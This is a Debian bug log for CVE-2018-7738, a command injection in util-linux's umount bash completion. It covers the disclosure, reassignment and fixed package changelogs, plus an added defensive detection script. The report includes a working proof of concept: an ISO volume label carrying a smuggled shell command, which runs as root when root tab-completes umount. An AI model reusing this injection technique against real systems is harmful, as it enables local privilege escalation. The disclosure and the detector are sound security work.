util-linux: CVE-2018-7738: code execution in bash-completion for umount

Related Vulnerabilities: CVE-2018-7738  

Debian Bug report logs - #892179

Reported by: Björn Bosselmann <Bjoern.Bosselmann@gdata.de>

Date: Tue, 6 Mar 2018 13:54:01 UTC

Severity: grave

Tags: fixed-upstream, security, upstream

Found in version util-linux/2.29.2-1

Fixed in versions util-linux/2.31.1-0.5, util-linux/2.29.2-1+deb9u1

Done: Salvatore Bonaccorso <carnil@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Gabriel F. T. Gomes <gabriel@inconstante.eti.br>:
Bug#892179; Package bash-completion. (Tue, 06 Mar 2018 13:54:04 GMT)


Acknowledgement sent to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
New Bug report received and forwarded. Copy sent to Gabriel F. T. Gomes <gabriel@inconstante.eti.br>. (Tue, 06 Mar 2018 13:54:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: Björn Bosselmann <Bjoern.Bosselmann@gdata.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: code execution in bash-completion for umount
Date: Tue, 6 Mar 2018 14:44:39 +0100
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security

Hi,

when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.

Example:

as regular user:
------------------------------
$ mkdir empty

$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)

$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.

(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------

as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..

# umount <TAB> ^C

# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root     0 Feb 14 10:01 foo
------------------------------

I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7

Björn Bosselmann
G DATA Software AG


-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information




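A defensive check for the condition described in the report above, as an added example that is not part of the original bug log or of util-linux: it parses input in /proc/self/mountinfo format and lists mount points whose names contain `$` or a backtick, the characters that start shell expansion. The function names and the sample lines are constructed for illustration; the last sample line reuses the mount point shown in the report.

```shell
#!/bin/sh
# Added example (not from the bug log or util-linux); function names are hypothetical.

# Constructed sample in /proc/self/mountinfo format. The last line reuses the
# mount point shown in the report; the other two are made up.
sample_mountinfo() {
    cat <<'EOF'
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
45 22 7:1 / /media/user/BACKUP\0402018 ro,nosuid,nodev shared:30 - iso9660 /dev/loop1 ro
46 22 7:0 / /media/user/$(IFS=":";cmd="touch:foo";$cmd) ro,nosuid,nodev shared:31 - iso9660 /dev/loop0 ro
EOF
}

# Reads mountinfo lines on stdin and prints "fstype<TAB>source<TAB>mountpoint"
# for every mount point containing '$' or a backtick.
# Field 5 is the mount point. The kernel writes spaces in it as \040, so
# whitespace field splitting is safe. Optional fields start at field 7 and end
# at a lone "-"; the filesystem type and the source follow that separator.
suspicious_mounts() {
    awk '
    $5 ~ /[$`]/ {
        fstype = "?"; src = "?"
        for (i = 7; i <= NF; i++)
            if ($i == "-") { fstype = $(i + 1); src = $(i + 2); break }
        printf "%s\t%s\t%s\n", fstype, src, $5
    }'
}

# Demo on the constructed sample. On a real host:
#   suspicious_mounts < /proc/self/mountinfo
sample_mountinfo | suspicious_mounts
```

An empty result only means that no currently mounted path carries those characters; it says nothing about whether the installed umount completion is one of the fixed versions.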

Information forwarded to debian-bugs-dist@lists.debian.org, Gabriel F. T. Gomes <gabriel@inconstante.eti.br>:
Bug#892179; Package bash-completion. (Tue, 06 Mar 2018 20:06:02 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Gabriel F. T. Gomes <gabriel@inconstante.eti.br>. (Tue, 06 Mar 2018 20:06:02 GMT)


Message #10 received at 892179@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Björn Bosselmann <Bjoern.Bosselmann@gdata.de>, 892179@bugs.debian.org
Cc: team@security.debian.org
Subject: Re: Bug#892179: code execution in bash-completion for umount
Date: Tue, 6 Mar 2018 21:03:07 +0100
Control: reassign -1 src:util-linux 2.29.2-1
Control: tags -1 + upstream fixed-upstream

Hi Björn

Thanks for reporting the issue!

On Tue, Mar 06, 2018 at 02:44:39PM +0100, Björn Bosselmann wrote:
> Package: bash-completion
> Version: 1:2.1-4.3
> Severity: grave
> Tags: security
> 
> Hi,
> 
> when bash-completion is installed, it uses
> /usr/share/bash-completion/completions/umount from umount package to
> provide autocompletion. This script does not escape mount paths
> correctly, so it allows a local user with rights to mount filesystems to
> execute commands in the context of the umount user (probably root).
> Unprivileged users can mount filesystems with custom mountpoints using
> udisks2, FUSE or with the help of desktop environments.

The umount completion is actually provided by util-linux (since 2.28-1
where it took over from bash-completion itself). I'm thus reassigning
it to src:util-linux. Then if the issue is present as well in
bash-completion earlier than 1:2.1-4.3, then 1:2.1-4.3 removed the
completion and would not be affected in the resulting binary packages
(source still might be).

Regards,
Salvatore



Bug reassigned from package 'bash-completion' to 'src:util-linux'. Request was from Salvatore Bonaccorso <carnil@debian.org> to 892179-submit@bugs.debian.org. (Tue, 06 Mar 2018 20:06:02 GMT)


No longer marked as found in versions bash-completion/1:2.1-4.3. Request was from Salvatore Bonaccorso <carnil@debian.org> to 892179-submit@bugs.debian.org. (Tue, 06 Mar 2018 20:06:03 GMT)


Marked as found in versions util-linux/2.29.2-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to 892179-submit@bugs.debian.org. (Tue, 06 Mar 2018 20:06:04 GMT)


Added tag(s) upstream and fixed-upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to 892179-submit@bugs.debian.org. (Tue, 06 Mar 2018 20:06:04 GMT)


Changed Bug title to 'util-linux: CVE-2018-7738: code execution in bash-completion for umount' from 'code execution in bash-completion for umount'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 06 Mar 2018 21:33:09 GMT)


Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Wed, 07 Mar 2018 16:39:26 GMT)


Notification sent to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
Bug acknowledged by developer. (Wed, 07 Mar 2018 16:39:26 GMT)


Message #25 received at 892179-close@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 892179-close@bugs.debian.org
Subject: Bug#892179: fixed in util-linux 2.31.1-0.5
Date: Wed, 07 Mar 2018 16:36:44 +0000
Source: util-linux
Source-Version: 2.31.1-0.5

We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 892179@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated util-linux package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Tue, 06 Mar 2018 22:31:39 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv rfkill
Architecture: source
Version: 2.31.1-0.5
Distribution: unstable
Urgency: medium
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 745771 892179
Description: 
 bsdutils   - basic utilities from 4.4BSD-Lite
 fdisk      - collection of partitioning utilities
 fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
 libblkid-dev - block device ID library - headers and static libraries
 libblkid1  - block device ID library
 libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
 libfdisk-dev - fdisk partitioning library - headers and static libraries
 libfdisk1  - fdisk partitioning library
 libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
 libmount-dev - device mounting library - headers and static libraries
 libmount1  - device mounting library
 libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
 libsmartcols-dev - smart column output alignment library - headers and static librar
 libsmartcols1 - smart column output alignment library
 libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb)
 libuuid1   - Universally Unique ID library
 libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
 mount      - tools for mounting and manipulating filesystems
 rfkill     - tool for enabling and disabling wireless devices
 setpriv    - tool to run a program with different Linux privilege settings
 util-linux - miscellaneous system utilities
 util-linux-locales - locales files for util-linux
 util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
 uuid-dev   - Universally Unique ID library - headers and static libraries
 uuid-runtime - runtime components for the Universally Unique ID library
Changes:
 util-linux (2.31.1-0.5) unstable; urgency=medium
 .
   * Non-maintainer upload.
 .
   [ Laurent Bigonville ]
   * debian/rules: Enable SMACK support for libmount
   * Enable audit support (Closes: #745771)
 .
   [ Salvatore Bonaccorso ]
   * bash-completion: (umount) use findmnt, escape a space in paths.
     (CVE-2018-7738)
     Fixes "code execution in bash-completion for umount". (Closes: #892179)




Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Sun, 11 Mar 2018 21:04:13 GMT)


Notification sent to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
Bug acknowledged by developer. (Sun, 11 Mar 2018 21:04:13 GMT)


Message #30 received at 892179-close@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 892179-close@bugs.debian.org
Subject: Bug#892179: fixed in util-linux 2.29.2-1+deb9u1
Date: Sun, 11 Mar 2018 21:02:07 +0000
Source: util-linux
Source-Version: 2.29.2-1+deb9u1

We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 892179@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated util-linux package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Wed, 07 Mar 2018 19:29:09 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv
Architecture: source
Version: 2.29.2-1+deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Debian util-linux Maintainers <ah-util-linux@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 892179
Description: 
 bsdutils   - basic utilities from 4.4BSD-Lite
 fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
 libblkid-dev - block device ID library - headers and static libraries
 libblkid1  - block device ID library
 libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
 libfdisk-dev - fdisk partitioning library - headers and static libraries
 libfdisk1  - fdisk partitioning library
 libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
 libmount-dev - device mounting library - headers and static libraries
 libmount1  - device mounting library
 libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
 libsmartcols-dev - smart column output alignment library - headers and static librar
 libsmartcols1 - smart column output alignment library
 libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb)
 libuuid1   - Universally Unique ID library
 libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
 mount      - tools for mounting and manipulating filesystems
 setpriv    - tool to run a program with different Linux privilege settings
 util-linux - miscellaneous system utilities
 util-linux-locales - locales files for util-linux
 util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
 uuid-dev   - Universally Unique ID library - headers and static libraries
 uuid-runtime - runtime components for the Universally Unique ID library
Changes:
 util-linux (2.29.2-1+deb9u1) stretch-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * bash-completion: (umount) use findmnt, escape a space in paths
     (CVE-2018-7738) (Closes: #892179)




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 29 Jul 2018 07:30:07 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:58:13 2019; Machine Name: buxtehude
